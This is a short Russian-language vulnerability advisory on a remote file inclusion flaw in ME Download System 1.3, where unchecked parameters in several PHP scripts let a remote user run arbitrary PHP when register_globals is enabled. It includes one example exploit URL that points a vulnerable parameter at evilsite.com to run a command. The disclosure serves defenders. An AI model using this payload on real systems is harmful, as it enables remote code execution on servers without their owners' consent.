• Партнер

  • Программа: ME Download System 1.3, возможно другие
    версии.

    Уязвимость позволяет удаленному
    пользователю выполнить произвольный PHP
    сценарий на целевой системе. Уязвимость
    существует из-за недостаточной обработки
    входных данных в параметре
    "Vb8878b936c2bd8ae0cab" в сценариях templates/header.php,
    inc/sett_style.php и inc/sett_smilies.php, в параметрах
    "Vb6c4d0e18a204a63b38f", "V18a78b93c3adaaae84e2" и
    "V9ae5d2ca9e9e787969ff" в сценарии inc/datei.php.
    Удаленный пользователь может выполнить
    произвольный PHP сценарий на целевой системе
    с привилегиями Web сервера. Для удачной
    эксплуатации уязвимости опция "register_globals"
    должна быть включена в конфигурационном
    файле PHP.

    Пример:

    http://[target]/templates/header.php? $Vb8878b936c2bd8ae0cab=http://evilsite.com?cmd=ls

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии